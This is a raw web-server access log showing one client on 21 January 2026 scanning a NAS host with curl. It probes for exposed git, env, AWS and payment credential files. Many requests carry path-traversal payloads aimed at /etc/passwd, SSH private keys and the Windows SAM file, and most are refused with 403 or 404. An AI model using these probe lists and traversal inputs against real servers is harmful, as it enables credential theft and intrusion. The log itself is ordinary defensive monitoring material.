[Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:02 +0000] - 403 403 - GET https nas.profibot.hu "/.github/funding.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:02 +0000] - 403 403 - GET https nas.profibot.hu "/.github/stale.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:03 +0000] - 403 403 - GET https nas.profibot.hu "/.gitlab-ci.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:03 +0000] - 403 403 - GET https nas.profibot.hu "/.gitlab" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:03 +0000] - 403 403 - GET https nas.profibot.hu "/.gitlab/issue_templates" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:03 +0000] - 403 403 - GET https nas.profibot.hu "/.gitlab/merge_request_templates" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:03 +0000] - 403 403 - GET https nas.profibot.hu "/.gitlab-ci" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:03 +0000] - 404 404 - GET https nas.profibot.hu "/bitbucket-pipelines.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:03 +0000] - 403 403 - GET https nas.profibot.hu "/.svn" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:03 +0000] - 403 403 - GET https nas.profibot.hu "/.svn/entries" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:03 +0000] - 403 403 - GET https nas.profibot.hu "/.svnignore" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:03 +0000] - 403 403 - GET https nas.profibot.hu "/.gitignore" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:03 +0000] - 403 403 - GET https nas.profibot.hu "/.gitattributes" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:03 +0000] - 403 403 - GET https nas.profibot.hu "/.gitmodules" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:03 +0000] - 403 403 - GET https nas.profibot.hu "/.git-credentials" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:03 +0000] - 403 403 - GET https nas.profibot.hu "/.git-askpass.sh" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:03 +0000] - 403 403 - GET https nas.profibot.hu "/.git-secret" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:03 +0000] - 403 403 - GET https nas.profibot.hu "/.git/hooks/pre-commit" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:03 +0000] - 403 403 - GET https nas.profibot.hu "/.git/hooks/post-commit" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:03 +0000] - 403 403 - GET https nas.profibot.hu "/.git/info" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:03 +0000] - 403 403 - GET https nas.profibot.hu "/.git/objects/info" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:03 +0000] - 403 403 - GET https nas.profibot.hu "/.git/objects/pack" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:03 +0000] - 404 404 - GET https nas.profibot.hu "/s3/credentials" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:03 +0000] - 404 404 - GET https nas.profibot.hu "/s3/bucket.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:03 +0000] - 404 404 - GET https nas.profibot.hu "/s3/bucket" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:03 +0000] - 404 404 - GET https nas.profibot.hu "/s3/buckets" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:03 +0000] - 404 404 - GET https nas.profibot.hu "/s3/backup" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:03 +0000] - 404 404 - GET https nas.profibot.hu "/s3.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:03 +0000] - 404 404 - GET https nas.profibot.hu "/s3.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:03 +0000] - 404 404 - GET https nas.profibot.hu "/s3.properties" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:04 +0000] - 404 404 - GET https nas.profibot.hu "/s3.key" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:04 +0000] - 404 404 - GET https nas.profibot.hu "/s3.secret" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:04 +0000] - 404 404 - GET https nas.profibot.hu "/aws/bucket" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:04 +0000] - 404 404 - GET https nas.profibot.hu "/aws/buckets" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:04 +0000] - 404 404 - GET https nas.profibot.hu "/aws/config/s3.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:04 +0000] - 404 404 - GET https nas.profibot.hu "/aws/s3/credentials" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:04 +0000] - 404 404 - GET https nas.profibot.hu "/aws/s3/env.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:04 +0000] - 404 404 - GET https nas.profibot.hu "/aws_s3_bucket" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:04 +0000] - 404 404 - GET https nas.profibot.hu "/aws_s3_config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:04 +0000] - 403 403 - GET https nas.profibot.hu "/.env.dev.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:04 +0000] - 403 403 - GET https nas.profibot.hu "/.env.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:04 +0000] - 403 403 - GET https nas.profibot.hu "/.env.local.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:04 +0000] - 403 403 - GET https nas.profibot.hu "/.env.prod.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:04 +0000] - 403 403 - GET https nas.profibot.hu "/.env.staging.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:04 +0000] - 403 403 - GET https nas.profibot.hu "/.git/config.bak" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:04 +0000] - 403 403 - GET https nas.profibot.hu "/.git/config.old" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:04 +0000] - 403 403 - GET https nas.profibot.hu "/.git/config~" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:04 +0000] - 403 403 - GET https nas.profibot.hu "/s3/.aws/config" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:04 +0000] - 403 403 - GET https nas.profibot.hu "/s3/.env.bak" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:04 +0000] - 403 403 - GET https nas.profibot.hu "/.cache/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:04 +0000] - 404 404 - GET https nas.profibot.hu "/wp-content/plugins/wp-db-backup/readme.txt" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:04 +0000] - 404 404 - GET https nas.profibot.hu "/login_up.php3" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:04 +0000] - 404 404 - GET https nas.profibot.hu "/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:04 +0000] - - 403 - GET https nas.profibot.hu "/?asset=../../../../root/.bash_history" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:04 +0000] - 404 404 - GET https nas.profibot.hu "/config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:04 +0000] - - 403 - GET https nas.profibot.hu "/?data=../../../../etc/passwd" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:04 +0000] - 404 404 - GET https nas.profibot.hu "/keystone/api" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:04 +0000] - 404 404 - GET https nas.profibot.hu "/etc/qmail/control/smtproutes" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:05 +0000] - 404 404 - GET https nas.profibot.hu "/robot/settings.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:05 +0000] - 404 404 - GET https nas.profibot.hu "/database.sql" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:05 +0000] - 404 404 - GET https nas.profibot.hu "/admin/dmarc/config" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:05 +0000] - 404 404 - GET https nas.profibot.hu "/etc/ssh/sshd_config" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:05 +0000] - 404 404 - GET https nas.profibot.hu "/api/private/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:05 +0000] - 404 404 - GET https nas.profibot.hu "/siteadmin/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:05 +0000] - 404 404 - GET https nas.profibot.hu "/fetch" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:05 +0000] - - 403 - GET https nas.profibot.hu "/?config=../../../../home/user/.ssh/id_rsa" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:05 +0000] - - 403 - GET https nas.profibot.hu "/?path=../../../../etc/nginx/nginx.conf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:05 +0000] - 404 404 - GET https nas.profibot.hu "/sync/from-url" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:05 +0000] - 404 404 - GET https nas.profibot.hu "/var/log/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:05 +0000] - - 403 - GET https nas.profibot.hu "/?action=../../../../etc/passwd" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:05 +0000] - 404 404 - GET https nas.profibot.hu "/paypal.config.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:05 +0000] - 404 404 - GET https nas.profibot.hu "/credentials.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:05 +0000] - 404 404 - GET https nas.profibot.hu "/ghost/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:05 +0000] - 404 404 - GET https nas.profibot.hu "/openapi.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:05 +0000] - 404 404 - GET https nas.profibot.hu "/editor/page/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:05 +0000] - 404 404 - GET https nas.profibot.hu "/payments/routing_matrix.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:05 +0000] - - 403 - GET https nas.profibot.hu "/?section=../../../../WINDOWS/system32/config/SAM" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:05 +0000] - 404 404 - GET https nas.profibot.hu "/apps/billing_gateway.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:05 +0000] - 404 404 - GET https nas.profibot.hu "/p2p/conditions.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:05 +0000] - - 403 - GET https nas.profibot.hu "/?lang=../../../../etc/mysql/my.cnf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:05 +0000] - 404 404 - GET https nas.profibot.hu "/lib/config.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:05 +0000] - 404 404 - GET https nas.profibot.hu "/logs/mail/error.log" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:05 +0000] - 404 404 - GET https nas.profibot.hu "/debugadmin/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:05 +0000] - 404 404 - GET https nas.profibot.hu "/config.php.bak" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:05 +0000] - - 403 - GET https nas.profibot.hu "/?inc=../../../../etc/hostname" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:05 +0000] - 404 404 - GET https nas.profibot.hu "/api/v1/notes/5/edit" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:05 +0000] - - 403 - GET https nas.profibot.hu "/?theme=../../../../.env" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:05 +0000] - 404 404 - GET https nas.profibot.hu "/deprecated/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:06 +0000] - - 403 - GET https nas.profibot.hu "/?view=../../../../wp-config.php" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:06 +0000] - 404 404 - GET https nas.profibot.hu "/config/coinbase.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:06 +0000] - 404 404 - GET https nas.profibot.hu "/wp-content/plugins/contact-form-7/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:06 +0000] - 404 404 - GET https nas.profibot.hu "/hc/en-us" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:06 +0000] - 404 404 - GET https nas.profibot.hu "/unity/projectSettings/ProjectSettings.asset" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:06 +0000] - 404 404 - GET https nas.profibot.hu "/vehicle/diagnostics.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:06 +0000] - 404 404 - GET https nas.profibot.hu "/var/report/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:06 +0000] - 404 404 - GET https nas.profibot.hu "/:2376" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:06 +0000] - 404 404 - GET https nas.profibot.hu "/:19999" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:06 +0000] - 404 404 - GET https nas.profibot.hu "/privacy_leak/vector.png" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:06 +0000] - 404 404 - GET https nas.profibot.hu "/sidecar/env.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:06 +0000] - 404 404 - GET https nas.profibot.hu "/localtunnel.log" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:06 +0000] - 404 404 - GET https nas.profibot.hu "/etc/passwd" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:06 +0000] - - 403 - GET https nas.profibot.hu "/?template=../../../../etc/mysql/my.cnf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:06 +0000] - 404 404 - GET https nas.profibot.hu "/src/styles.scss" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:06 +0000] - 404 404 - GET https nas.profibot.hu "/log/mail.log" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:06 +0000] - - 403 - GET https nas.profibot.hu "/?module=../../../../var/log/nginx/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:06 +0000] - - 403 - GET https nas.profibot.hu "/?read=../../../../etc/mysql/my.cnf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:06 +0000] - - 403 - GET https nas.profibot.hu "/?asset=../../../../home/user/.ssh/id_rsa" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:06 +0000] - - 403 - GET https nas.profibot.hu "/?template_file=../../../../etc/hosts" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:06 +0000] - 404 404 - GET https nas.profibot.hu "/cloudfront/signature" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:06 +0000] - 404 404 - GET https nas.profibot.hu "/angular.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:06 +0000] - 404 404 - GET https nas.profibot.hu "/app/config/parameters.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:06 +0000] - 404 404 - GET https nas.profibot.hu "/app/config/http.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:06 +0000] - - 403 - GET https nas.profibot.hu "/?view=../../../../.env" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:06 +0000] - 404 404 - GET https nas.profibot.hu "/saltstack/top.sls" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:06 +0000] - - 403 - GET https nas.profibot.hu "/?source=../../../../etc/hosts" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:06 +0000] - 404 404 - GET https nas.profibot.hu "/blockchain/env.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:06 +0000] - 404 404 - GET https nas.profibot.hu "/vehicle/api/keys.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:07 +0000] - 404 404 - GET https nas.profibot.hu "/queue/settings/email.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:07 +0000] - 404 404 - GET https nas.profibot.hu "/dev/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:07 +0000] - 404 404 - GET https nas.profibot.hu "/mail/transport.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:07 +0000] - 404 404 - GET https nas.profibot.hu "/boards.txt" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:07 +0000] - 404 404 - GET https nas.profibot.hu "/gateways/params.cfg" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:07 +0000] - 404 404 - GET https nas.profibot.hu "/old_versions/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:07 +0000] - 404 404 - GET https nas.profibot.hu "/config/stripe.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:07 +0000] - - 403 - GET https nas.profibot.hu "/?load=../../../../var/log/apache2/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:07 +0000] - 404 404 - GET https nas.profibot.hu "/bioinformatics/workflow.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:07 +0000] - 404 404 - GET https nas.profibot.hu "/var/logs/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:07 +0000] - 404 404 - GET https nas.profibot.hu "/truststore/settings.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:07 +0000] - 404 404 - GET https nas.profibot.hu "/yarn.lock" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:07 +0000] - 404 404 - GET https nas.profibot.hu "/audio/tts_model.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:07 +0000] - 404 404 - GET https nas.profibot.hu "/plans/payment_schedule.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:07 +0000] - 404 404 - GET https nas.profibot.hu "/auth/group/permissions" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:07 +0000] - 404 404 - GET https nas.profibot.hu "/tmp_files/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:07 +0000] - - 403 - GET https nas.profibot.hu "/?read=../../../../etc/passwd" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:07 +0000] - 404 404 - GET https nas.profibot.hu "/backend/backend/settings" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:07 +0000] - - 403 - GET https nas.profibot.hu "/?module=../../../../etc/php.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:07 +0000] - 404 404 - GET https nas.profibot.hu "/user/login" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:07 +0000] - 404 404 - GET https nas.profibot.hu "/machine.config" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:07 +0000] - 404 404 - GET https nas.profibot.hu "/drone.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:07 +0000] - 404 404 - GET https nas.profibot.hu "/api-gateway-config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:07 +0000] - 404 404 - GET https nas.profibot.hu "/config/aws.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:07 +0000] - 404 404 - GET https nas.profibot.hu "/xmlrpc.php" 